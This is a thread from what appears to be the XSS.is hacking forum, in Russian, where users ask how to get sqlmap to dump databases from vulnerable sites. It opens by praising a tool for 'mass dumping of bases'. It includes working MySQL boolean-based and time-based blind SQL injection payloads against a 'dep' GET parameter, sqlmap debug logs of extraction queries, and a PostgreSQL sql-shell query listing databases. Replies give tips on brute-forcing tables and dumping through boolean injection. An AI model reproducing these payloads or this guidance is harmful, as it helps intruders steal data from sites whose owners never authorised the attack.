• XSS.stack #1 – первый литературный журнал от юзеров форума

Общие вопросы по работе sqlmap

Отслеживать
Вчера наткнулся на статью WrapSqlmap - массовый слив баз с помощью доработанного sqlmap. Там чувак сам дорабатывает, добавляет кое-какие функции. Короче, огонь.
 
Нужен совет нубу. Есть уязвимость, но нормально не отдает дб. (мало прав). Так-же текущий пользователь не админ субд. Баннер отдает.
это waf или дело в другом? В каком направлении тестить? Ещё такой момент, засунул в нетспаркер, он показал совсем другого пользователя дб.
sql:
Код: 
Parameter: dep (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: dep=test' RLIKE (SELECT (CASE WHEN (9687=9687) THEN 0x74657374 ELSE 0x28 END)) AND 'ncfH'='ncfH&lang=g

    Type: time-based blind
    Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
    Payload: dep=test' AND 7425=BENCHMARK(5000000,MD5(0x6c696e61)) AND 'PyFN'='PyFN&lang=g
error&payload
Код: 
[WARNING] information_schema not available, back-end DBMS is MySQL < 5. database names will be fetched from 'mysql' database
Код: 
[]12:32:01] [WARNING] potential permission problems detected ('command denied')
[12:32:01] [PAYLOAD] test' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(db)) AS CHAR),0x20) FROM mysql.db),1,1))>48) THEN 0x74657374 ELSE 0x28 END)) AND 'ChvN'='ChvN
[12:32:01] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[12:32:01] [PAYLOAD] test' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(db)) AS CHAR),0x20) FROM mysql.db),1,1))>9) THEN 0x74657374 ELSE 0x28 END)) AND 'ChvN'='ChvN
[12:32:01] [DEBUG] got HTTP error code: 500 (Internal Server Error)
 
badquery сказал(а):
Нужен совет нубу. Есть уязвимость, но нормально не отдает дб. (мало прав). Так-же текущий пользователь не админ субд. Баннер отдает.
это waf или дело в другом? В каком направлении тестить? Ещё такой момент, засунул в нетспаркер, он показал совсем другого пользователя дб.
sql:
Код: 
Parameter: dep (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: dep=test' RLIKE (SELECT (CASE WHEN (9687=9687) THEN 0x74657374 ELSE 0x28 END)) AND 'ncfH'='ncfH&lang=g

    Type: time-based blind
    Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
    Payload: dep=test' AND 7425=BENCHMARK(5000000,MD5(0x6c696e61)) AND 'PyFN'='PyFN&lang=g
error&payload
Код: 
[WARNING] information_schema not available, back-end DBMS is MySQL < 5. database names will be fetched from 'mysql' database
Код: 
[]12:32:01] [WARNING] potential permission problems detected ('command denied')
[12:32:01] [PAYLOAD] test' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(db)) AS CHAR),0x20) FROM mysql.db),1,1))>48) THEN 0x74657374 ELSE 0x28 END)) AND 'ChvN'='ChvN
[12:32:01] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[12:32:01] [PAYLOAD] test' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(db)) AS CHAR),0x20) FROM mysql.db),1,1))>9) THEN 0x74657374 ELSE 0x28 END)) AND 'ChvN'='ChvN
[12:32:01] [DEBUG] got HTTP error code: 500 (Internal Server Error)
В мускуле ниже пятой или от пятой нету information_chema, нужно брутить таблицы)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Вопрос по PostgreSQL
Type: boolean-based blind
Видит 3 БД
[WARNING] schema names are going to be used on PostgreSQL for enumeration as the counterpart to database names on other DBMSes
pg_catalog
public
information_schema
гуглил где там лежат базы . ввел базы
--SQL-SHELL

SELECT datname FROM pg_database
он выводит бд
как проще то сделать что бы сдампить? Ничего не нагуглил особо
 
Последнее редактирование:
uid сказал(а):
Вопрос по PostgreSQL
Type: boolean-based blind
Видит 3 БД
[WARNING] schema names are going to be used on PostgreSQL for enumeration as the counterpart to database names on other DBMSes
pg_catalog
public
information_schema
гуглил где там лежат базы . ввел базы
--SQL-SHELL

SELECT datname FROM pg_database
он выводит бд
как проще то сделать что бы сдампить? Ничего не нагуглил особо
Нихрена не понял шо тебе надо, но дампить через булиан придеться) либо искать другой вид иньекции)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
через --dbs
выводит только 2 db
pg_catalog
и public
через
--SQL-SHELL

SELECT datname FROM pg_database
выводит на много больше, как их с дампить через булиан вот в чем вопрос
 
uid сказал(а):
через --dbs
выводит только 2 db
pg_catalog
и public
через
--SQL-SHELL

SELECT datname FROM pg_database
выводит на много больше, как их с дампить через булиан вот в чем вопрос
ну можешь попробовать дописать запрос к той бд которая тебе нужна
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх